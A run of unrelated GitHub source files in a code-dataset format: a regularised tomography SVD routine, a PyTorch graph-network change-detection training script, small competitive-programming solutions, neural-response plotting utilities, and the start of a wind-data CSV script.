calculation, by default DummySpinner()\n\n Returns\n -------\n tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray]\n singular values :math:`\\\\Sigma`, left singular vectors :math:`U` and inverted solution basis\n :math:`\\\\tilde{V}`\n\n Notes\n -----\n The ill-posed inversion equation can be solved by minimizing the following functional:\n\n .. math::\n\n \\\\Lambda(x) \\\\equiv \\\\|Tx - b\\\\|_2^2 + \\\\lambda O(x),\\\\label{eq:ill-posed}\\\\tag{1}\n\n where :math:`A` is a matrix in :math:`\\\\mathbb{R}^{m\\\\times n}`, :math:`x` is a solution vector\n in :math:`\\\\mathbb{R}^n` and :math:`b` is a given data vector in :math:`\\\\mathbb{R}^m`.\n :math:`O(x)` denotes the regularization functional, and :math:`\\\\lambda` is the regularization\n parameter balancing the data misfit and the regularization term.\n\n The regularization functional is typically a quadratic form :math:`O(x) = x^\\\\mathsf{T} H x`,\n with a symetric positive semi-definite matrix :math:`H \\\\in \\\\mathbb{R}^{n\\\\times n}`.\n\n Hence, the minimum of :math:`\\\\Lambda(x)` is given by the solution of the following equation:\n\n .. math::\n\n x = (T^\\\\mathsf{T} T + \\\\lambda H)^{-1}T^\\\\mathsf{T} b.\\\\label{eq:ill-posed-solution}\\\\tag{2}\n\n A direct inversion of this equation is possible, however, it often needs a lot of computational\n resources. Additionaly, to comprehend the solution, the cholesky decomposition and the singular\n value decomposition (SVD) are often used [1]_.\n\n 1. Cholesky decomposition of :math:`H`\n\n .. math::\n\n PHP^\\\\mathsf{T} = LL^\\\\mathsf{T},\n\n where :math:`L` is a lower triangular matrix and :math:`P` is a fill-reducing permutation.\n\n 2. SVD of :math:`A\\\\equiv TP^\\\\mathsf{T}L^{-\\\\mathsf{T}}`\n\n Let us substitute the result of cholesky decomposition into :math:`\\\\ref{eq:ill-posed-solution}`:\n\n .. 
math::\n\n x &= \\\\left(T^\\\\mathsf{T} T + \\\\lambda H\\\\right)^{-1}T^\\\\mathsf{T} b \\\\\\\\\n &= \\\\left(\n T^\\\\mathsf{T} T + \\\\lambda P^\\\\mathsf{T} L L^\\\\mathsf{T} P\n \\\\right)^{-1} T^\\\\mathsf{T} b \\\\\\\\\n &= \\\\left[\n P^\\\\mathsf{T} L\n \\\\left(\n L^{-1}P T^\\\\mathsf{T}\\\\ TP^\\\\mathsf{T} L^{-\\\\mathsf{T}} + \\\\lambda I_n\n \\\\right)\n L^\\\\mathsf{T} P\n \\\\right]^{-1} T^\\\\mathsf{T} b \\\\\\\\\n &= P^\\\\mathsf{T} L^{-\\\\mathsf{T}}\\\\left(A^\\\\mathsf{T}A + \\\\lambda I_n\\\\right)^{-1}\n A^\\\\mathsf{T} b \\\\quad(\\\\because A\\\\equiv TP^\\\\mathsf{T}L^{-\\\\mathsf{T}})\\\\\\\\\n &= P^\\\\mathsf{T} L^{-\\\\mathsf{T}}\n \\\\left(\n V\\\\Sigma U^\\\\mathsf{T} U\\\\Sigma V^\\\\mathsf{T} + \\\\lambda I_n\n \\\\right)^{-1}\n V\\\\Sigma^\\\\mathsf{T} U^\\\\mathsf{T} b\n \\\\quad(\\\\because A = U\\\\Sigma V^\\\\mathsf{T}: \\\\text{SVD})\\\\\\\\\n &= P^\\\\mathsf{T} L^{-\\\\mathsf{T}} V^{-\\\\mathsf{T}}\n \\\\left(\\\\Sigma^2 + \\\\lambda I_r\\\\right)^{-1}\n V^{-1}V \\\\Sigma U^\\\\mathsf{T} b \\\\\\\\\n &= \\\\tilde{V}\n \\\\left(I_r + \\\\lambda \\\\Sigma^{-2}\\\\right)^{-1}\n \\\\Sigma^{-1} U^\\\\mathsf{T} b \\\\\\\\\n &= \\\\tilde{V}W\\\\Sigma^{-1}U^\\\\mathsf{T} b,\n\n where :math:`U \\\\in \\\\mathbb{R}^{m\\\\times r}` and :math:`V \\\\in \\\\mathbb{R}^{n\\\\times r}`\n are the left and right singular vectors of :math:`A`, respectively,\n :math:`\\\\Sigma \\\\in \\\\mathbb{R}^{r\\\\times r}` is the diagonal matrix of singular values,\n :math:`r` is the rank of :math:`A` (:math:`r \\\\leq \\\\min(m, n)`),\n :math:`\\\\tilde{V} \\\\equiv P^\\\\mathsf{T}L^{-\\\\mathsf{T}}V \\\\in \\\\mathbb{R}^{n\\\\times r}` is\n the inverted solution basis,\n :math:`W \\\\equiv \\\\text{diag}(w_1, w_2, ..., w_r) \\\\in \\\\mathbb{R}^{r\\\\times r}`\n is the window function matrix and :math:`w_i` is the window function defined as follows:\n\n .. math::\n\n w_i \\\\equiv \\\\frac{1}{1 + \\\\lambda / \\\\sigma_i^2},\n\n where :math:`\\\\sigma_i` is the :math:`i`-th singular value of :math:`A`.\n\n As described above, the inverted solution :math:`x` can be finally calculated as follows:\n\n .. math::\n\n x = \\\\tilde{V}W\\\\Sigma^{-1}U^\\\\mathsf{T} b. \\\\label{eq:inverted-solution}\\\\tag{3}\n\n This function computes and returns :math:`\\\\Sigma`, :math:`U` and :math:`\\\\tilde{V}`\n using the above procedure if :math:`T` and :math:`H` are given.\n\n References\n ----------\n .. [1] Odstrčil T, Pütterich T, Odstrčil M, Gude A, Igochine V, Stroth U; ASDEX Upgrade Team,\n *Optimized tomography methods for plasma emissivity reconstruction at the ASDEX Upgrade\n tokamak*, Rev. Sci. Instrum. **87**, 123505 (2016), :doi:`10.1063/1.4971367`\n\n Examples\n --------\n .. 
prompt:: python >>> auto\n\n        >>> s, u, basis = compute_svd(gmat, hmat, use_gpu=True)\n    \"\"\"\n    # === Validation of input parameters ===========================================================\n    # import modules\n    if use_gpu:\n        from cupy import asarray, eye, get_default_memory_pool, get_default_pinned_memory_pool, sqrt\n        from cupy.linalg import svd\n        from cupyx.scipy.sparse import csr_matrix, diags\n        from cupyx.scipy.sparse.linalg import spsolve_triangular\n        from scipy.sparse.linalg import eigsh  # NOTE: cupy eigsh has a bug\n\n        mempool = get_default_memory_pool()\n        pinned_mempool = get_default_pinned_memory_pool()\n        _cupy_available = True\n    else:\n        from numpy import asarray, eye, sqrt\n        from scipy.linalg import svd\n        from scipy.sparse import csr_matrix, diags\n        from scipy.sparse.linalg import eigsh, spsolve_triangular\n\n        _cupy_available = False\n\n    # check if hmat is a sparse matrix\n    if not isinstance(hmat, sp_csc_matrix):\n        raise TypeError(\"hmat must be a scipy.sparse.csc_matrix.\")\n\n    # check matrix dimension\n    if hasattr(gmat, \"ndim\"):\n        if gmat.ndim != 2 or hmat.ndim != 2:\n            raise ValueError(\"gmat and hmat must be 2-dimensional arrays.\")\n    else:\n        raise AttributeError(\"gmat and hmat must have the attribute 'ndim'.\")\n\n    # check matrix shape\n    if hasattr(gmat, \"shape\"):\n        if gmat.shape[1] != hmat.shape[0]:\n            raise ValueError(\"the number of columns of gmat must be same as that of hmat\")\n        if hmat.shape[0] != hmat.shape[1]:\n            raise ValueError(\"hmat must be a square matrix.\")\n    else:\n        raise AttributeError(\"gmat and hmat must have the attribute 'shape'.\")\n\n    # check spinner instance\n    if sp is None:\n        sp = DummySpinner()\n    elif not isinstance(sp, (Spinner, DummySpinner)):\n        raise TypeError(\"sp must be a Spinner or DummySpinner instance.\")\n\n    _base_text = sp.text + \" \"\n    _use_gpu_text = \" by GPU\" if _cupy_available else \"\"\n    # ==============================================================================================\n\n    # compute L and P^T using Cholesky decomposition\n    sp.text = _base_text + \"(computing L and P^T using Cholesky decomposition)\"\n    L_mat, Pt = _compute_L_Pt(hmat)\n\n    # compute L^{-T} using triangular solver\n    sp.text = _base_text + f\"(computing L^-T using triangular solver{_use_gpu_text})\"\n    Lt_inv = spsolve_triangular(\n        csr_matrix(L_mat), eye(L_mat.shape[0]), lower=True, overwrite_b=True\n    ).T\n\n    # convert to numpy array from cupy array\n    if _cupy_available:\n        Lt_inv = Lt_inv.get()\n\n        # free GPU memory pools\n        mempool.free_all_blocks()\n        pinned_mempool.free_all_blocks()\n\n    # compute Pt @ Lt^{-1}\n    # This calculation is performed in CPU because the performance of cupy is worse than numpy or\n    # scipy in this calculation.\n    sp.text = _base_text + \"(computing Pt @ Lt^-1)\"\n    Pt_Lt_inv: sp_csr_matrix = Pt @ sp_csr_matrix(Lt_inv)\n\n    if issparse(gmat):\n        # compute A = gmat @ Pt @ Lt^{-1}\n        sp.text = _base_text + \"(computing A = gmat @ Pt @ L^-T)\"\n        A_mat: sp_csr_matrix = gmat.tocsc() @ Pt_Lt_inv\n\n        # compute AA^T\n        sp.text = _base_text + \"(computing AA^T)\"\n        At = A_mat.T\n        AAt = A_mat @ At\n\n        # compute eigenvalues and eigenvectors of AA^T\n        sp.text = _base_text + f\"(computing eigenvalues and vectors of AA^T{_use_gpu_text})\"\n        # NOTE: cupy eigsh has a bug (https://github.com/cupy/cupy/issues/6446) so\n        # scipy.sparse.linalg.eigsh is used instead\n        eigvals, u_vecs = eigsh(AAt, k=AAt.shape[0] - 1, which=\"LM\", return_eigenvectors=True)\n
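        # NOTE (editor): scipy's eigsh requires k < N, so the smallest eigenpair is\n        # dropped here; this is harmless in practice because non-positive (numerically\n        # zero) eigenvalues are filtered out in _compute_su below anyway.\n        # eigvals, u_vecs = eigsh(\n        #     csr_matrix(AAt), k=AAt.shape[0] - 1, which=\"LM\", 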
return_eigenvectors=True\n        #     )\n\n        # compute singular values and left vectors\n        sp.text = _base_text + f\"(computing singular values and left vectors{_use_gpu_text})\"\n        singular, u_vecs = _compute_su(asarray(eigvals), asarray(u_vecs), sqrt)\n\n        # compute right singular vectors\n        sp.text = _base_text + f\"(computing right singular vectors{_use_gpu_text})\"\n        v_mat = asarray(At.A) @ asarray(u_vecs) @ diags(1 / singular)\n\n        # compute inverted solution basis\n        sp.text = _base_text + f\"(computing inverted solution basis{_use_gpu_text})\"\n        basis = asarray(Pt_Lt_inv.A) @ v_mat\n\n    else:\n        # if gmat is a dense matrix, use SVD solver\n        # compute A = gmat @ Pt @ Lt^{-1}\n        sp.text = _base_text + \"(computing A = gmat @ Pt @ L^-T)\"\n        A_mat: ndarray = gmat @ Pt_Lt_inv.A\n\n        # compute SVD components\n        sp.text = _base_text + f\"(computing SVD components directly{_use_gpu_text})\"\n        kwargs = dict(overwrite_a=True) if not _cupy_available else {}\n        u_vecs, singular, vh = svd(asarray(A_mat), full_matrices=False, **kwargs)\n\n        # compute inverted solution basis\n        sp.text = _base_text + f\"(computing inverted solution basis{_use_gpu_text})\"\n        basis = asarray(Pt_Lt_inv.A) @ asarray(vh.T)\n\n    if _cupy_available:\n        singular = singular.get()\n        u_vecs = u_vecs.get()\n        basis = basis.get()\n\n        # free GPU memory pools\n        mempool.free_all_blocks()\n        pinned_mempool.free_all_blocks()\n\n    # reset spinner text\n    sp.text = _base_text\n\n    return singular, u_vecs, basis\n\n\ndef _compute_L_Pt(hmat: sp_csc_matrix) -> tuple[sp_csr_matrix, sp_csr_matrix]:\n    # cholesky decomposition of H\n    factor = cholesky(hmat)\n    L_mat = factor.L().tocsr()\n\n    # compute the fill-reducing permutation matrix P\n    P_vec = factor.P()\n    rows = arange(P_vec.size)\n    data = ones_like(rows)\n    P_mat = sp_csc_matrix((data, (rows, P_vec)), dtype=float)\n\n    return L_mat, P_mat.T\n\n\ndef _compute_su(eigvals, eigvecs, sqrt: Callable):\n    # sort eigenvalues and eigenvectors in descending order\n    descend_index = eigvals.argsort()[::-1]\n    eigvals = eigvals[descend_index]\n    eigvecs = eigvecs[:, descend_index]\n\n    # calculate singular values and left vectors (w/o zero eigenvalues)\n    singular = sqrt(eigvals[eigvals > 0])\n    u_vecs = eigvecs[:, eigvals > 0]\n    return singular, u_vecs\n","repo_name":"munechika-koyo/cherab_inversion","sub_path":"cherab/inversion/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":29571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32495142407","text":"import pickle\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv,global_mean_pool\nfrom torch.nn import Sequential as Seq, Linear as Lin, ReLU, BatchNorm1d as BN, Dropout\nfrom torch.nn import Conv1d,MaxPool1d\nimport random\n\n\nlabels = {'nochange': 0, 'added': 1, 'removed': 2, 'change': 3, 'color_change': 4}\n\n\ndef MLP(channels):\n    return Seq(*[\n        Seq(Lin(channels[i - 1], channels[i]), ReLU())\n        for i in range(1, len(channels))\n    ])\n\n\nclass Incep1(torch.nn.Module):\n    def __init__(self,features):\n        super().__init__()\n        self.c1 = Conv1d(features,int(features/2), kernel_size=1)\n        self.c2 = Conv1d(int(features/2),int(features / 2), kernel_size=1)\n        self.c3 = Conv1d(int(features/2),features, kernel_size=1)\n        self.bn1 = BN(int(features))\n        self.bn2 = BN(int(features/2))\n    def forward(self,x):\n        x1 = self.c1(x)\n        x1 = F.relu(x1)\n        x1 = self.bn2(x1)\n        x2 = self.c2(x1)\n        x2 = F.relu(x2)\n        x2 = self.bn2(x2)\n        x3 = self.c2(x1)\n        x3 = F.relu(x3)\n        x3 = 
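# A minimal sketch (scipy only, not from the original module) of the sparse
# permutation matrix that _compute_L_Pt builds from CHOLMOD's fill-reducing
# ordering vector factor.P(): it sets P[i, p[i]] = 1, so (P @ x)[i] == x[p[i]].
import numpy as np
from scipy.sparse import csc_matrix

p = np.array([2, 0, 3, 1])  # example permutation vector
rows = np.arange(p.size)
P = csc_matrix((np.ones_like(rows, dtype=float), (rows, p)))

x = np.array([10.0, 20.0, 30.0, 40.0])
assert (P @ x == x[p]).all()
assert (P.T @ (P @ x) == x).all()  # permutations are orthogonal: P^T == P^-1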
self.bn2(x3)\n x4 = MaxPool1d(kernel_size=1)(x1)\n x5 = self.c3(x4)\n x5 = F.relu(x5)\n x5 = self.bn1(x5)\n merged = torch.cat([x1, x2, x3, x5], dim=1)\n return merged\n\n\nclass Incep2(torch.nn.Module):\n def __init__(self,features):\n super().__init__()\n self.c1 = Conv1d(features,features,kernel_size=1)\n self.c2 = Conv1d(features,int(features/2), kernel_size=1)\n self.c3 = Conv1d(features,int(features/4), kernel_size=1)\n self.bn1 = BN(features)\n self.bn2= BN(int(features/2))\n self.bn3 = BN(int(features / 4))\n\n def forward(self,x):\n s1 = self.c1(x)\n s1 = F.relu(s1)\n s1 = self.bn1(s1)\n s1 = F.relu(s1)\n\n s2 = self.c2(x)\n s2 = F.relu(s2)\n s2 = self.bn2(s2)\n s2 = F.relu(s2)\n\n s3 = self.c3(x)\n s3 = F.relu(s3)\n s3 = self.bn3(s3)\n s3 = F.relu(s3)\n\n merged = torch.cat([s1,s2,s3],dim = 1)\n merged = F.relu(merged)\n return merged\n\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = GCNConv(33, 128)\n self.conv2 = GCNConv(128,64)\n self.conv3 = GCNConv(64,32)\n self.lin1 = MLP([280, 128])\n self.mlp = Seq(\n MLP([128, 64]), Dropout(0.5), MLP([64, 32]), Dropout(0.5),\n Lin(32, 6))\n\n self.lin2 = MLP([140, 128])\n self.mlp2 = Seq(\n MLP([128, 64]), Dropout(0.5), MLP([64, 32]), Dropout(0.5),\n Lin(32, 6))\n\n self.colconv = GCNConv(39, 128)\n self.finallin = Lin(12,5)\n self.i1 = Incep1(32)\n self.i2 = Incep2(80)\n\n\n def forward(self, data16, data20,datacol):\n x16, edge_index16, batch16 = data16.features, data16.edge_index, data16.batch\n x20, edge_index20, batch20 = data20.features, data20.edge_index, data20.batch\n xcol,edge_indexcol,batchcol = datacol.features, datacol.edge_index , datacol.batch\n x16 = self.conv1(x16, edge_index16)\n x16 = F.relu(x16)\n x16 = self.conv2(x16, edge_index16)\n x16 = F.relu(x16)\n x16 = self.conv3(x16, edge_index16)\n x16 = torch.transpose(x16,0,1)\n x16 = self.i1(x16.unsqueeze(0))\n x16 = self.i2(x16)\n x16 = torch.transpose(x16.squeeze(0),0,1)\n x16 = global_mean_pool(x16,batch16)\n\n x20 = self.conv1(x20, edge_index20)\n x20 = F.relu(x20)\n x20 = self.conv2(x20, edge_index20)\n x20 = F.relu(x20)\n x20 = self.conv3(x20, edge_index20)\n x20 = torch.transpose(x20, 0, 1)\n x20 = self.i1(x20.unsqueeze(0))\n x20 = self.i2(x20)\n x20 = torch.transpose(x20.squeeze(0), 0, 1)\n\n x20 = global_mean_pool(x20, batch20)\n\n xcol = self.colconv(xcol, edge_indexcol)\n xcol = F.relu(xcol)\n xcol = self.conv2(xcol, edge_indexcol)\n xcol = F.relu(xcol)\n xcol = self.conv3(xcol, edge_indexcol)\n xcol = torch.transpose(xcol, 0, 1)\n xcol = self.i1(xcol.unsqueeze(0))\n xcol = self.i2(xcol)\n xcol = torch.transpose(xcol.squeeze(0), 0, 1)\n\n xcol = global_mean_pool(xcol, batchcol)\n xcol = self.lin2(xcol)\n\n xcol = self.mlp2(xcol)\n\n x = torch.cat([x16, x20], dim=1)\n x = self.lin1(x)\n x = self.mlp(x)\n out =torch.cat([x,xcol],dim = 1)\n out = self.finallin(out)\n return F.log_softmax(out,dim =-1)\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = Net().to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001)\n\n\ndef train(loader):\n model.train()\n correct = 0\n confmatrix = np.zeros((5, 5))\n predictions = []\n total_loss = 0\n for i in loader:\n if i[0].flag == 1 and i[1].flag == 1:\n if (labels[i[0].truelab[0]] == 0):\n correct += 1\n if (labels[i[0].truelab[0]] == 0):\n confmatrix[0][0] += 1\n correct += 1\n else:\n confmatrix[0][labels[i[0].truelab[0]]] += 1\n predictions.append(0)\n else:\n data16 = i[0].to(device)\n data20 = i[1].to(device)\n dc = 
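# The Net above pushes three graphs (two point clouds and a colour graph)
# through shared GCN stacks and concatenates the pooled embeddings. A
# stripped-down sketch of a single stream, with hypothetical sizes, assuming
# torch and torch_geometric are installed:
import torch
import torch.nn.functional as F
from torch_geometric.nn import GCNConv, global_mean_pool

class GCNStream(torch.nn.Module):
    def __init__(self, in_dim: int = 33, out_dim: int = 32):
        super().__init__()
        self.conv1 = GCNConv(in_dim, 128)
        self.conv2 = GCNConv(128, out_dim)

    def forward(self, x, edge_index, batch):
        x = F.relu(self.conv1(x, edge_index))
        x = self.conv2(x, edge_index)
        return global_mean_pool(x, batch)  # one embedding per graph in batch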
i[2].to(device)\n optimizer.zero_grad()\n model.eval()\n out = model(data16,data20,dc)\n model.train()\n loss = F.nll_loss(out,data16.y)\n yval = labels[data16.truelab[0]]\n pred = out.max(dim=1)[1].cpu().detach().numpy()\n loss.backward()\n optimizer.step()\n total_loss += loss.item()\n correct +=out.max(dim=1)[1].eq(data16.y).sum().item()\n predictions.append(out.max(dim=1)[1].cpu().detach().numpy())\n confmatrix[pred[0]][yval] += 1\n return correct/len(loader),predictions,confmatrix\n\n\ndef test(loader):\n model.eval()\n confmatrix = np.zeros((5,5))\n correct = 0\n predictions = []\n for i in loader:\n if i[0].flag == 1 and i[1].flag == 1:\n if labels[i[0].truelab[0]] == 0:\n confmatrix[0][0] += 1\n correct += 1\n else:\n confmatrix[0][labels[i[0].truelab[0]]] += 1\n predictions.append(0)\n else:\n data16 = i[0].to(device)\n data20 = i[1].to(device)\n dc = i[2].to(device)\n with torch.no_grad():\n out = model(data16,data20,dc)\n yval = labels[data16.truelab[0]]\n pred = out.max(dim=1)[1].cpu().detach().numpy()\n correct += out.max(dim=1)[1].eq(data16.y).sum().item()\n predictions.append(pred)\n confmatrix[pred[0]][yval] +=1\n return correct/len(loader),predictions,confmatrix\n\n\ndef save_model(model):\n torch.save(model.state_dict(), \"/home/rada/sdp/data/model1.pth\")\n\n\ndef load_model(model):\n model.load_state_dict(torch.load(\"/home/rada/sdp/data/model1.pth\"))\n model.eval()\n\n\nif __name__ == '__main__':\n maxacc = 0\n with open(\"data/train.dat\", \"rb\") as fp:\n loader_train = pickle.load(fp)\n with open(\"data/validation.dat\", \"rb\") as fp2:\n loader_test = pickle.load(fp2)\n\n for epoch in range(0, 120):\n print(epoch)\n print(\"train:\",end =' ')\n trainacc, trainpreds,train_confusion_matrix = train(loader_train)\n random.shuffle(loader_train)\n print(trainacc)\n print(train_confusion_matrix)\n print(\"test\",end=' ')\n testacc, testpreds,test_confusion_matrix = test(loader_train)\n print(testacc)\n print(test_confusion_matrix)\n random.shuffle(loader_test)\n\n #if testacc > maxacc:\n #save_model(model)\n\n\n\n\n","repo_name":"darshanbangera/3D-Change-Detection","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7809,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"26088487705","text":"import math\nclass Solution:\n def isUgly(self, n: int) -> bool:\n if n <= 0:\n return False\n if n == 1:\n return True\n if n % 2 == 0: return self.isUgly(n//2)\n elif n % 3 == 0: return self.isUgly(n//3)\n elif n % 5 == 0: return self.isUgly(n//5)\n else: return False\n return True\n # if n <= 0:\n # return False\n # primes = set()\n # num = n\n # while num % 2 == 0:\n # primes.add(2)\n # num = num/2\n # for i in range(3, int(math.sqrt(num))+1, 2):\n # while num % i== 0:\n # # print(i)\n # primes.add(i)\n # num = num / i\n # if num > 2:\n # primes.add(int(num))\n # if len(primes) > 3:\n # return False\n # else:\n # for p in primes:\n # if p not in [2,3,5]:\n # return False\n # return True","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"0263-ugly-number/0263-ugly-number.py","file_name":"0263-ugly-number.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42545455852","text":"import quantities as pq\nimport pylgn\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nimport matplotlib.animation as animation\n\n\nclass 
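# The recursive isUgly above strips one prime factor per call; an equivalent
# iterative version (an alternative sketch, not from the original solution)
# avoids recursion-depth limits for inputs with many small factors:
def is_ugly_iterative(n: int) -> bool:
    # An ugly number has no prime factors other than 2, 3 and 5.
    if n <= 0:
        return False
    for p in (2, 3, 5):
        while n % p == 0:
            n //= p
    return n == 1

assert is_ugly_iterative(30) and not is_ugly_iterative(14)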
MidpointNormalize(colors.Normalize):\n \"\"\"\n https://matplotlib.org/gallery/userdemo/colormap_normalizations.html\n \"\"\"\n def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):\n self.midpoint = midpoint\n colors.Normalize.__init__(self, vmin, vmax, clip)\n\n def __call__(self, value, clip=None):\n x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]\n return np.ma.masked_array(np.interp(value, x, y))\n\n\ndef raster_plot(data, xlabel=\"Time\", ylabel=\"Neuron\",\n orientation='horizontal', lineoffsets=1, linelengths=0.5,\n linewidths=None, colors=None, linestyles=\"solid\"):\n\n \"\"\"\n Raster plot\n\n Parameters\n ----------\n data : list or ndarray\n list/array of spike trains for individual locations.\n Each row corresponds to a location.\n\n xlabel : str, optional\n\n ylabel : str, optional\n\n orientation : {'horizontal', 'vertical'}, optional\n\n lineoffsets : scalar or sequence of scalars, optional\n\n linelengths : scalar or sequence of scalars, optional\n\n linewidths : scalar, scalar sequence or None, optional\n\n colors : color, sequence of colors or None, optional\n\n linestyles : str or tuple or a sequence of such values, optional\n\n \"\"\"\n fig, ax = plt.subplots()\n ax.eventplot(np.array(data), colors=colors, lineoffsets=lineoffsets, linelengths=linelengths,\n orientation=orientation, linewidths=linewidths, linestyles=linestyles)\n ax.set_ylabel(ylabel)\n ax.set_xlabel(xlabel)\n plt.show()\n\n return fig, ax\n\n\ndef animate_cube(cube, title=None, dt=None,\n vmin=None, vmax=None, cmap=\"RdBu_r\",\n save_anim=False, filename=\"anim.mp4\", writer=\"ffmpeg\"):\n \"\"\"\n Animates 3d array\n\n Parameters\n ----------\n cube : quantity array/array_like\n input array (Nt x Nx x Ny)\n\n title : str, optional\n\n dt : quantity scalar, optional, default: None\n\n vmin : quantity scalar/float, optional, default: cube.min()\n\n vmin : quantity scalar/float, optional, default: cube.max()\n\n save_anim : bool, optional, default: False\n\n filename : str, optional, default: \"anim.mp4\"\n\n writer : str, optional, default: \"ffmpeg\"\n\n \"\"\"\n fig = plt.figure()\n vmin = vmin or cube.min()\n vmax = vmax or cube.max()\n plt.title(\"\") if title is None else plt.title(title)\n\n def init():\n im.set_data(cube[0, :, :])\n ttl.set_text(\"\")\n return im, ttl\n\n def animate(j):\n im.set_data(cube[j, :, :])\n ttl.set_text(\"Frame = \" + str(j)) if dt is None \\\n else ttl.set_text(\"Time = {} {}\".format(round(j*dt.magnitude, 2),\n dt.dimensionality))\n return im, ttl\n\n ttl = plt.suptitle(\"\")\n im = plt.imshow(cube[0, :, :], animated=True, vmin=vmin, vmax=vmax,\n origin=\"lower\", cmap=cmap,\n norm=MidpointNormalize(midpoint=0.))\n\n plt.tight_layout()\n plt.subplots_adjust(top=0.9)\n\n anim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=cube.shape[0], interval=50,\n repeat=True, repeat_delay=1000)\n\n plt.colorbar()\n if save_anim:\n anim.save(filename, writer=writer)\n plt.show()\n\n return anim\n\n\ndef animate_spike_activity(data, times, positions, title=None,\n marker=\"o\", marker_size=10, marker_color=\"C0\",\n save_anim=False, filename=\"anim.mp4\", writer=\"ffmpeg\"):\n\n \"\"\"\n Animates spike activity\n\n Parameters\n ----------\n data : array_like\n input array (Nx x Ny x N_spikes)\n\n times : quantity array\n\n positions : quantity array\n\n title : str, optional\n\n marker : MarkerStyle, optional, default: 'o'\n marker style\n\n marker_size : float, optional, default: 10\n marker size\n\n marker_color : color, sequence, or 
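# MidpointNormalize above pins a chosen value to the centre of the colormap.
# A short usage sketch with made-up data, assuming the class defined above is
# in scope:
import numpy as np
import matplotlib.pyplot as plt

data = np.random.default_rng(1).normal(loc=0.5, size=(32, 32))
norm = MidpointNormalize(vmin=data.min(), vmax=data.max(), midpoint=0.0)
plt.imshow(data, cmap="RdBu_r", norm=norm)  # 0 maps to the colormap midpoint
plt.colorbar()
plt.show()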
sequence of color, optional, default: 'C0'\n marker color\n\n save_anim : bool, optional, default: False\n\n filename : str, optional, default: \"anim.mp4\"\n\n writer : str, optional, default: \"ffmpeg\"\n\n \"\"\"\n fig, ax = plt.subplots(1)\n ax.set_xlabel(\"x (deg)\")\n ax.set_ylabel(\"y (deg)\")\n plt.title(\"\") if title is None else plt.title(title)\n\n Nx, Ny = data.shape\n cube = np.zeros([times.shape[0], Nx, Ny])\n\n x, y = np.meshgrid(positions, positions)\n dt = times[1] - times[0]\n\n for m in range(Nx):\n for n in range(Ny):\n ids = np.round(data[m, n][:] / dt).astype(int).magnitude\n for i in ids:\n cube[i, m, n] = marker_size\n\n def init():\n scat.set_sizes(cube[0, :, :].flatten())\n ttl.set_text(\"\")\n return scat, ttl\n\n def animate(j):\n scat.set_sizes(cube[j, :, :].flatten())\n ttl.set_text(\"Time = {} {}\".format(round(j*dt.magnitude, 2),\n dt.dimensionality))\n return scat, ttl\n\n ttl = plt.suptitle(\"\")\n scat = plt.scatter(x=x, y=y, s=cube[0, :, :],\n marker=marker, c=marker_color)\n\n anim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=cube.shape[0], interval=100,\n repeat=True, repeat_delay=1000)\n\n if save_anim:\n anim.save(filename, writer=writer)\n plt.show()\n\n return anim\n","repo_name":"miladh/pylgn","sub_path":"pylgn/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"23558889841","text":"#f = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/input2', 'r')\r\n# C:\\Users\\Avinash\\Desktop\\Google codejam 2017\\pycharmworks\\AA-small-practice.in\r\n# f = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/A-large-practice.in', 'r')\r\nf = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/B-small-attempt0.in', 'r')\r\ndata = f.readlines()\r\nf.close()\r\nf = open('tidy2', 'w')\r\nt = data[0]\r\ny = 0\r\nfor i in data[1:]:\r\n y += 1\r\n number = int(i)\r\n stringnumber = str(number)\r\n string1 = \"\"\r\n for j in range(len(stringnumber) - 1):\r\n ten = int(stringnumber[j])\r\n if stringnumber[j] > stringnumber[j + 1]:\r\n string1 = str(ten - 1)\r\n for k in range(j, len(stringnumber) - 1):\r\n string1 += \"9\"\r\n stringnumber = stringnumber[:j] + string1\r\n\r\n if stringnumber[j] == stringnumber[j + 1]:\r\n try:\r\n for k in range(j, len(stringnumber)):\r\n if stringnumber[j] > stringnumber[k]:\r\n string1 = str(ten - 1)\r\n for x in range(j, len(stringnumber) - 1):\r\n string1 += \"9\"\r\n stringnumber = stringnumber[:j] + string1\r\n\r\n except:\r\n continue\r\n\r\n count = (int(stringnumber))\r\n print(count)\r\n print(\"Case #\" + str(y) + \": \" + str(count), file=f)\r\n\r\nf.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3538.py","file_name":"3538.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13215850541","text":"import csv\nimport glob\nfrom tibbslib import *\nimport shutil\nload_states()\ninfo=get_json('data\\\\info.json')\ninfo['statedata']='wind_nrel'\n\n\nourstates = [\"iowaminnesota\",\"northtexasoklahoma\",\"texasercot\",\"kansas\"]\n\n\n\n#siteid=[]\nlngs=[]\nlats=[]\nn=0\nfor name in glob.glob('unknown\\\\*.csv'):\n #purename=name.split('\\\\')[-1]\n #siteid.append(purename.split('-')[0])\n with open(name,'r') as readfile:\n reader=csv.reader(readfile,lineterminator='\\n')\n n+=1\n nrow=0\n 
